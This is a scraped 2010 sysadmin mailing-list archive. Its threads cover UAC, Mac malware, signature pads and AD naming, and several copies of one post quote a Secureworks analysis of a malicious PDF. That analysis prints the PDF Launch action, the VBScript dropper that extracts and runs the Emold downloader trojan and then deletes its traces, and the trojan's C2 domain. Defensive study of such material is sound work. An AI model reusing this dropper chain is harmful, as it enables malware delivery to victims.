s...@sunbelt-software.com


  


-Original Message-
From: Sean Rector [mailto:sean.rec...@vaopera.org] 
Sent: Wednesday, April 28, 2010 5:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Thanks, Z!

Sean Rector, MCSE

-Original Message-
From: Ziots, Edward [mailto:ezi...@lifespan.org] 
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideas: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.

It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs

This uses cmd.exe to write some lines of text to a file called script.vbs and
then executes script.vbs and batscript.vbs.

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream

We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Emold trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe", and

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Sean Rector
Thanks, Z!

Sean Rector, MCSE

-Original Message-
From: Ziots, Edward [mailto:ezi...@lifespan.org] 
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideas: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.

It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs

This uses cmd.exe to write some lines of text to a file called script.vbs and
then executes script.vbs and batscript.vbs.

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream

We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Emold trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA Network Engineer Lifespan Organization
401-639-3505
ezi...@li
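
A triage check for the Launch action described in the write-up quoted above, added here as an example; it is not code from the posters or from the Secureworks write-up. It finds /S /Launch actions in uncompressed PDF objects, reads the /F and /P literal strings with proper parenthesis nesting, and looks for the 'SS / 'EE marker pair. The function names are hypothetical and the sample PDF is constructed and inert; it assumes objects are not inside compressed object streams and that /F is a literal string.

```python
import re

# Constructed, inert sample shaped like the object quoted in the write-up:
# object 8 is a Launch action (its name hex-escaped as /L#61unch),
# object 5 is a harmless URI action. The /P string only echoes text.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /OpenAction 8 0 R >>
endobj
5 0 obj
<< /Type /Action /S /URI /URI (http://example.invalid/) >>
endobj
8 0 obj
<<
 /Type /Action
 /S /L#61unch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo constructed-sample (nested parens) inert)
 >>
>>
endobj
%'SS
%constructed marker block, no payload
%'EE
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj\b", re.S)
NAME_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
SCRIPT_HOSTS = (b"cmd.exe", b"cscript", b"wscript")


def decode_names(buf):
    """Undo #xx escapes so /L#61unch is seen as /Launch.
    Applied to the whole object body, which is good enough for triage."""
    return NAME_ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), buf)


def read_literal(buf, start):
    """Read a PDF literal string whose '(' is at buf[start].
    Honours nested parentheses and backslash escapes; a regex that stops
    at the first ')' would cut a /P command short."""
    depth, i, out = 0, start, bytearray()
    while i < len(buf):
        ch = buf[i:i + 1]
        if ch == b"\\" and i + 1 < len(buf):
            out += buf[i + 1:i + 2]   # keep the escaped byte as-is (simplified)
            i += 2
            continue
        if ch == b"(":
            depth += 1
            if depth > 1:
                out += ch
        elif ch == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += ch
        else:
            out += ch
        i += 1
    return bytes(out)                 # unterminated string: return what was read


def get_string(body, key):
    """Return the literal string value of /<key>, or None if absent."""
    m = re.search(rb"/" + key + rb"\s*\(", body)
    return read_literal(body, m.end() - 1) if m else None


def scan_pdf(data):
    """Return one finding per object that contains a Launch action."""
    findings = []
    for m in OBJ_RE.finditer(data):
        body = decode_names(m.group(2))
        if not LAUNCH_RE.search(body):
            continue
        program = get_string(body, b"F")
        findings.append({
            "object": int(m.group(1)),
            "program": program,
            "params": get_string(body, b"P"),
            "script_host": any(h in (program or b"").lower() for h in SCRIPT_HOSTS),
        })
    return findings


def has_marker_block(data):
    """True if an 'SS marker is followed later in the file by an 'EE marker."""
    start = data.find(b"'SS")
    return start != -1 and data.find(b"'EE", start) != -1


if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print(f)
    print("marker block:", has_marker_block(SAMPLE_PDF))
```

A hit on a script host in /F is the stronger signal; the marker pair on its own is only a hint, since short byte sequences can occur by chance in binary streams.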

RE: sig pad for Word

2010-04-28 Thread Raper, Jonathan - Eagle
Have you looked at Topaz? I don't know what they cost, but that's what we've 
used for our physician signature captures.


Jonathan L. Raper, A+, MCSA, MCSE
Technology Coordinator
Eagle Physicians & Associates, PA
jra...@eaglemds.com
www.eaglemds.com


From: James Kerr [mailto:cluster...@gmail.com]
Sent: Wednesday, April 28, 2010 3:08 PM
To: NT System Admin Issues
Subject: Re: sig pad for Word

Well, it's for our clients to sign off on medical consent forms.
- Original Message -
From: Kevin Lundy
To: NT System Admin Issues
Sent: Wednesday, April 28, 2010 3:05 PM
Subject: Re: sig pad for Word

Have you considered digital signatures?
On Wed, Apr 28, 2010 at 2:46 PM, James Kerr <cluster...@gmail.com> wrote:
Can anyone recommend an inexpensive USB signature pad for signing Word 
documents?

James


















RE: Admin rights, UAC, etc. (was: WTF? Fake AV)

2010-04-28 Thread Ziots, Edward
Define "Properly Secured" because what is secured from one user's
perspective is totally different than what another user thinks, and no
XP machine or computer for that matter can be 100% protected. 

 

I also second the notion about UAC, that is what it was built for, if
you turn it off because you don't like the prompts when you run items,
then you have just defeated a major security control in the OS, and it's
only going to be time before you get 0wned.. 

 

Z

 

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org

 

From: Jon Harris [mailto:jk.har...@gmail.com] 
Sent: Wednesday, April 28, 2010 4:46 PM
To: NT System Admin Issues
Subject: Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

 

" With the exception of exploitation of unpatched vulnerabilities,
I've never seen malware lead to a system compromise on a
properly-secured Win XP machine"

 

Sorry but how many (l)users know how to do this?  How many home owners even
know this is possible.  I would much rather see a Windows Vista with UAC
turned on or Windows 7 in one of their hands than the typical XP box.
You can teach people not to click Okay or Yes and then call and ask or
just go on without allowing the security holes.  Yes it is hard to do
and no you sometimes have to make it hurt to get their attention but
like James says charge them more each time they bring in a corrupted
system and the pain will cause them to start using their heads.

On Wed, Apr 28, 2010 at 11:13 AM, Ben Scott wrote:

On Wed, Apr 28, 2010 at 10:18 AM,  wrote:
> Are there any reports out there that show Windows 7 running with UAC
> that its minimizes the infections of spyware.

 I too would be interested in seeing hard data on this.  I've seen
lots of marketing claims, and the occasional anecdote, but I remain
unconvinced that UAC (as typically configured, and for the SOHO user)
will do anything more than train lusers to click "Allow" when they see
it.  I've certainly got my own anecdotal evidence that lusers do just
that.

 To me, the chief advantage to UAC is FRV (filesystem and registry
virtualization).  It lets software which thinks it needs to write to
protected locations run anyway.  *That's* a big win.  Lets people who
understand security cope with software vendors who don't.

 The ability for UAC to use the GUI to prompt for alternate admin
credentials for privilege elevation is very convenient, but it's not
compelling to me.  You can achieve similar results using RUNAS.  Not
as convenient, but gets the job done.

> While I am not a huge fan of MACS ...

 It took me a minute to figure out you meant "Macintoshes" and not
"Mandatory Access Control System".  "Mac" -- the computer from Apple
-- is not an acronym.  :)

 (It wouldn't have been so confusing except that MACS and DACS are
the two common models used for describing access control/permissions.
Windows mostly uses DACS (hence, DACL, Discretionary Access Control
List), but the "Integrity Levels" features in Win 6.x are heading in
the direction of MACS.)

> .. their security model is obviously much better than Windows.

 While Windows is often shipped with a default no-security admin
account, Windows fully supports creating a user without admin rights.
It's what we do for *everybody* here at %WORK%.  We've been doing it
for *years*, and it works very well.

 The only hard part is convincing software vendors that admin rights
are not required to do things like word processing.

 More generally, one problem is the many PC builders who ship their
computers configured to run users as admins by default.  Even if UAC
works as advertised, that's not a good thing.

 But the real hard problem here is home lusers who don't understand
security.  They consider security a problem, something to be removed.
And they will install whatever a web page tells them to.  I don't have
a good solution for that.  I suspect nobody does.

> Even with users not in admin group in Windows XP, Vista I have
> seen malware get right on and hose a machine.

 With the exception of exploitation of unpatched vulnerabilities,
I've never seen malware lead to a system compromise on a
properly-secured Win XP machine.

 I've seen it screw up a user account pretty well, to the point where
it's easier to erase and reset the user profile than it is to repair
the registry wreckage.  Most of the time, though, all we have to do is
login as an admin and delete *.EXE *.DLL *.OCX under their user
profile folder.

 Are you using a proper set of ACLs on the filesystem?  My strategy
is that users should only be able to create/modify under their own
user profile folder.  Nothing else.  Well, the default C:\WINDOWS\TEMP
permissions are okay.

 In particular, by default, users can create files and folders under
 and .
This is a very bad idea on Microsoft's part.  Malware gets in,
compromises "All Users", admin logs in, Explorer or something else
trips over something in "All Users", malwa

RE: WTF? Fake AV

2010-04-28 Thread Stu Sjouwerman
"an incredible fire-hose coming in at about 50Gigs a day"

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 4:33 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Not sure what point you are disputing but 115 (total) versus 70,000 per day 
(your numbers from earlier today) is kind of lopsided.  I'm not saying that 115 
isn't enough to worry about, but if 115 in 8 years is "growing fast", what in 
the world do you call 70,000 per day?!?!

-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware for the Mac. 
That's why we are releasing a VIPRE client for the Mac in Q2. They have sold 
enough machines to make it attractive for cyber crime to go after. All security 
models will break as per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that 
Microsoft simply tells app vendors what to do and expects them to move at the 
drop of a hat.

The reality is that MS has typically bent over backwards to ensure backwards 
compatibility (to a fault you may argue) for applications wherever possible. 
That has been one of the tenets of their OS design since Windows had DOS boxes.

 They have compatibility flags within the OS to special case specific apps and 
installers. They have wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of API's along with new versions. They allow 
unsigned hardware even though the new model requires signed hardware. Etc, 
etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development 
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is an 
inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we
> > are discussing here.
>
>   The only point I was making (and the one you're determined to
> ignore, it appears): Microsoft routinely throws their weight around
> to tell the rest of the industry to change to Microsoft's new way of
> doing things.  Microsoft elected not to do that with security.
>
>   The question was asked (paraphrased): "Why did it take Microsoft so
> long to do anything about security?"  I answered that question.  No
> less, no more.  You're the one who keeps trying to drag the question
> off into the weeds.
>
>   Of course, an equally valid question would be, "Why did it take
> Apple so long to do anything about security?"  But that wasn't the
> question I was addressing.
>
> > Using AV infection #'s to compare those things and draw the
> > conclusion he did is not accurate, IMO.
>
>   That I would agree with.
> 
> -- Ben



RE: WTF? Fake AV

2010-04-28 Thread Ziots, Edward
Also there is a new Trojan dropper malware out there using PDFs and fake (your 
Email settings have changed language) to get people to download or view a 
doc1.pdf file accordingly, which has a nasty payload.

The writeup was posted at Secureworks earlier yesterday, tried posting it to 
the list multiple times and everyone's Forefront email clients are beating me 
over the head saying I am sending them a Trojan dropper email, ohh well so much 
for trying to get the word out :) 

Z

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 4:33 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Not sure what point you are disputing but 115 (total) versus 70,000 per day 
(your numbers from earlier today) is kind of lopsided.  I'm not saying that 115 
isn't enough to worry about, but if 115 in 8 years is "growing fast", what in 
the world do you call 70,000 per day?!?!

-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware for the Mac. 
That's why we are releasing a VIPRE client for the Mac in Q2. They have sold 
enough machines to make it attractive for cyber crime to go after. All security 
models will break as per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that 
Microsoft simply tells app vendors what to do and expects them to move at the 
drop of a hat.

The reality is that MS has typically bent over backwards to ensure backwards 
compatibility (to a fault you may argue) for applications wherever possible. 
That has been one of the tenets of their OS design since Windows had DOS boxes.

They have compatibility flags within the OS to special case specific apps and 
installers. They have wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of APIs along with new versions. They allow 
unsigned hardware even though the new model requires signed hardware. Etc, 
etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development 
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is an 
inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to ignore, it
> appears): Microsoft routinely throws their weight around to tell the rest of
> the industry to change to Microsoft's new way of doing things.  Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so long to
> do anything about security?"  I answered that question.  No less, no more.
> You're the one who keeps trying to drag the question off into the weeds.
> 
>   Of course, an equally valid question would be, "Why did it take Apple so
> long to do anything about security?"  But that wasn't the question I was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the conclusion
> > he did is not accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 



RE: Current AD domain naming best practices

2010-04-28 Thread Michael B. Smith
ADFS requires a third-party certificate. This means you have to find a trusted 
provider to issue the certificate. You won't get that for .int or .local. ASB's 
suggestion of using a COMPLETELY DIFFERENT domain (but still one you own) is 
completely valid.

In re: ADFS, from the ADFS deployment whitepaper:

Trusted certification authorities

Because both TLS/SSL and token signing rely on digital certificates, 
certification authorities (CAs) are an important part of ADFS. Public CAs, such 
as VeriSign, Inc., represent a mutually trusted third party that allows the 
identity of the bearer of a certificate to be identified. You can use 
enterprise CAs, such as Microsoft Certificate Services, for providing token 
signing and other internal certificate services.

If a client is presented with a server's authentication certificate, the client 
computer verifies that the CA that issued the certificate is in the client's 
list of trusted CAs and that the CA has not revoked that certificate. This 
verification ensures that the client has reached the intended server. When a 
certificate is used for verifying signed tokens, the client uses the 
certificate to verify that the token was issued by the correct federation 
server and that the token has not been tampered with.

UPN claim

When you configure the resource partner, you can specify whether a UPN claim is 
to be sent to the resource partner. You can also specify a suffix mapping so 
that any suffix is mapped into a specified outgoing suffix. For example, 
juli...@sales.tailspintoys.com can be mapped to juli...@tailspintoys.com. Note 
that only one outgoing suffix may be specified. 


E-mail claim

When you configure the resource partner, you can specify whether an e-mail 
claim is to be sent to the resource partner. You can also specify a suffix 
mapping so that any suffix is mapped into a specified suffix. For example, 
vernet...@sales.tailspintoys.com can be mapped to vernet...@tailspintoys.com. 
Note that only one outgoing suffix may be specified.


Regards,

Michael B. Smith
Consultant and Exchange MVP
http://TheEssentialExchange.com


-Original Message-
From: Joseph Heaton [mailto:jhea...@dfg.ca.gov] 
Sent: Wednesday, April 28, 2010 3:57 PM
To: NT System Admin Issues
Subject: Re: Current AD domain naming best practices

I'm simply gathering information on the 3 options, and what everyone 
recommends.  Unfortunately, there is no clear-cut "winner".  I've found that 
all 3 are valid options, depending on how much administrative overhead you want 
to add to the process.  However, Michael Smith brought up a rather strong 
concern over why different names would be bad, if you're possibly going to 
implement ADFS.

Anyway, I very much appreciate your, and everyone's, input.

Joe

>>> "Andrew S. Baker"  4/28/2010 12:33 PM >>>
A subdomain is fine, but suffers many of the same drawbacks as using a single 
DNS namespace.

And you're involving more DNS servers into the resolution process for what 
purpose again?

-ASB: http://XeeSM.com/AndrewBaker 

Sent from my Motorola Droid

On Apr 28, 2010 12:51 PM, "Joseph Heaton"  wrote:

Andrew,

So you don't recommend the subdomain?  Also, if you could expand on your 
answer, it'd be great, as I'm bringing all ideas to a meeting this afternoon, 
with pros/cons behind each option.

>>> "Andrew S. Baker"  4/28/2010 8:55 AM >>>

Use two separate domain names, even if you register the internal one.

You can avoid all manner of p...
the Novell guy is saying.  Is that

still true today? We are on private IPs internally, so external forces can't 
route to the inside an...





RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Ziots, Edward
Gang, there is another PDF exploit going on that may or may not be hitting your 
places. Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideas: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly, which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different DNS returns 
on nslookup. 
Also scan all your PDF files; some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.

It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs

This uses cmd.exe to write some lines of text to a file called script.vbs and 
then executes script.vbs and batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
echo pf=f.ReadAll
echo s=InStr(pf,"'SS")
echo e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream

We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Emold trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
